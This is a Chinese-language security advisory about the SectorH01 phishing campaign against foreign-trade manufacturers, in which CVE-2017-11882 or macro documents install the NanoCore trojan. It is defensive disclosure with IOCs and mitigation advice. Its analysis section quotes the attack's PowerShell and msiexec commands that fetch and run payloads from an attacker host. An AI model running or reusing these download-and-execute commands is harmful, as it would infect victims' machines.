首頁 > 安全研究 > 安全通報 > 安全通告

SectorH01攻擊組織釣魚郵件事件安全通告

發布時間 2019-09-22

事件背景



近期檢測到SectorH01攻擊組織“商貿信”釣魚郵件攻擊在9月出現新一輪增長。在此次攻擊中,黑客精心構造的帶有office公式編輯器漏洞CVE-2017-11882或宏代碼的惡意文檔,將其作為附件批量發送至外貿行業企業郵箱中,在其打開文檔中招后植入遠控木馬NanoCore進行機密信息竊取和遠程控制,本次攻擊高峰時期每天成功投遞超3000個郵件地址。



事件描述



通過溯源分析,我們發現黑客疑似使用一款名為“****郵件群發器”的軟件進行郵箱地址采集和郵件批量投遞。據測算,該軟件具有5000個/小時的郵箱地址采集能力,并且在發件時可以自動更換代理IP,已被黑客利用于針對對外貿企業的“自動化”攻擊。部分受攻擊企業如下:



根據統計數據,有超過1000家企業受到此次攻擊影響,其中近一半以上分布在廣東、江蘇、浙江和上海四地,其中廣東占比超過30%。特別是廣東深圳和東莞由于制造業和外貿行業密集,成為本次攻擊受害最嚴重的區域。


 
從行業分布來看,“商貿信”攻擊目標主要集中在工業制造及貿易行業。統計數據顯示,被攻擊的88%為制造業,剩余12%是與制造業提供相關聯的銷售、運輸、商務服務行業。




事件分析



釣魚郵件主要通過偽造以下發件郵箱進行發送,其中使用最多的為


kieth@sdgtrading.co.uk
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


以其中一封郵件為例,從郵件頭部信息中可以看到發件人為“Keith Ward/SDG /UK”,發件郵箱地址為kieth@sdgtrading.co.uk。sdgtrading是一家總部位于英國的進出口貿易公司,目前打開該公司官方網站可以正常訪問。


打開網站的contact-us頁面我們發現有一個職務為UK & European Sales(英國及歐洲地區銷售)的人員聯系方式為keith@sdgtrading.co.uk,而這正是釣魚郵件發件郵箱(有兩個字母位置交換)。我們推測攻擊者可能通過爬取或者人工搜集的方式獲取了該貿易公司的郵件地址,然后偽裝成該公司的銷售人員發送釣魚郵件進行攻擊。



釣魚郵件發件人信息



貿易公司銷售人員信息



釣魚郵件


郵件內容是關于貿易訂單確認和價格咨詢。郵件表述中高頻出現出現以下詞句:
“訂購”、“價格”、“價目表”、“銷售條件”、“折扣”、“裝運日期”、“采購規格”等。



郵件中還指出郵件附件中包含“想要采購的產品條目”文檔,請閱讀后進行回復,部分文檔名如下:


RFQ0591403-SDG.doc

RFQ015770082.doc


分析發現,附件文檔中包含Office公式編輯器漏洞CVE-2017-11882利用代碼或惡意宏代碼,經過漏洞攻擊或宏代碼執行過程,會觸發用于下載木馬的Powershell命令執行,進一步下載木馬:


'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'


除了利用Powershell,還有部分攻擊中使用Windows安裝程序(msiexec.exe)安裝MSI包文件進行木馬下載:


msiEXEc  /i http[:]//oppofile.duckdns.org/d/dar.msi


從目前捕獲到的攻擊文檔中我們發現有以下木馬下載地址:


hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi


遠控木馬


被下載植入的實際上是的經過混淆的遠控木馬NanoCore,NanoCore是使用.Net語言編寫的功能強大的遠程訪問控制木馬(RAT),可以在目標主機上進行文件操作,屏幕控制,運行指定程序,還支持插件擴展功能,被感染NanoCore木馬的電腦會出現嚴重信息泄露,攻擊者還可以利用中毒電腦為跳板,對目標網絡繼續進行滲透入侵。


核心模塊被加密后以位圖格式保存在資源文件


“tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt”中



從資源中獲取到數據后,經過多次解密得到最終的PE文件,然后將其Load到內存,并跳轉到入口位置執行。



最終執行的NanoCore木馬功能強大,可執行各種惡意操作,如文件操作,注冊表編輯,進程控制,文件傳輸,遠程命令執行,鍵盤記錄等。以下為該木馬控制端界面:



群發軟件


通過排查,發現了一個名為“***\郵件群發器.exe”的可疑程序,使用該可疑文件名中的“***郵件群發器”關鍵字進行搜索,發現了這款名為****的郵件群發器軟件。該軟件具有從網絡上批量爬取郵箱地址,并針對獲得的郵箱進行批量發送指定郵件的功能。



我們下載該軟件,并進行注冊和試用。根據其界面展示的功能,只需編寫好郵件內容(任意填寫發件人姓名)、批量添加收件人地址、點擊“開始群發”三步,即可將郵件快速發送至大批的目標郵箱中。


該軟件還支持查看群發結果,如果有發送失敗的情況,可以一鍵重發。發送時還可以選擇自動更換代理IP,這在一定程度上可以隱藏真實發件IP。



該軟件還有一個重要的功能是,支持從指定網站采集目標郵箱。該功能頁面默認的源網站地址為http[:]//www.****.biz/。我們嘗試使用該網站進行郵箱采集,在10分鐘之內可以采集到近800個郵箱地址,換算后一個小時之內可以采集到5000個郵箱,而這些被采集到的郵箱都存在被攻擊的可能。


 

可以看到這個默認的郵箱采集網站“**網”(www.*****.biz)是一個貿易信息發布平臺,大量廠商(機械、化工、電氣、能源、儀器等行業)在該網站上發布等各類產品的供應或求購信息。而每一條信息都會附帶廠商的電話、郵編、郵箱等聯系方式,“****郵件群發器”正是從這些信息中獲取了大量的郵箱地址。



攻擊思路


從以下幾個角度,我們認為黑客使用了郵件群發軟件“****郵件群發器”進行輔助攻擊:


1、群發軟件“****”有近期訪問發件人IP的記錄;
2、受害企業類型與“****郵件群發器”默認采集郵箱類型一致(工業品貿易公司);
3、攻擊的影響范圍與該軟件的采集能力吻合(受害郵箱約3000個/日 & 軟件的采集能力約5000個/小時)。
推測黑客實施攻擊的思路如下:
1、黑客下載郵件群發軟件;
2、構造帶有CVE-2017-11882漏洞利用(或者宏代碼)的office惡意文件;
3、使用****郵件群發器從貿易分類信息網站批量采集目標郵箱地址;
4、使用準備好的惡意文檔作為附件,構造釣魚郵件并批量發送;
5、等待收件人打開附件并中招,通過遠控木馬NanoCore對目標進行遠程控制。



總結


在此次攻擊事件中可以發現,黑客與灰產從業人員出現了交集?;耶a人員開發出郵件群發工具,工具可針對網站上的公開郵箱進行爬取,可利用獲取到的郵箱進行批量群發郵件。工具在其注冊的“官網”上進行公開售賣,使用說明中“正義”地提到“僅用于正規郵件營銷,濫用者后果自負”。但工具一旦售出,便難以保證被用于合法用途。


而黑客獲得此軟件后,將其納入攻擊武器中的一員。隨后,只需編寫好木馬,構造釣魚郵件,就可以利用該工具將釣魚郵件自動化、大批量地發送至企業的相關郵箱中。



修復建議



1、企業郵箱網管將以下發件郵箱設置為黑名單


kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


2、不要打開不明來源的郵件附件,對于附件中的文件要謹慎運行,如發現有腳本或其他可執行文件可先使用殺毒軟件進行掃描;


3、升級office系列軟件到最新版本,及時修復office程序漏洞,不要隨意運行不可信文檔中的宏;


4、推薦部署終端安全管理系統防御病毒木馬攻擊;


5、使用入侵檢測系統檢測未知黑客的各種可疑攻擊行為。



IOC


郵箱


kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


郵件附件


fec34e9741abedea7f0a4fa991bdc618
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905

a9958884c16f17c2c9e4d75f92117352


NanaCore木馬


2c7885159feae6ebde634418591ad276

453a235ad5ea7055f2af2c51c95a5bb2


域名


oppofile.duckdns.org


URL


hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi



參考鏈接



https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/


上一篇 下一篇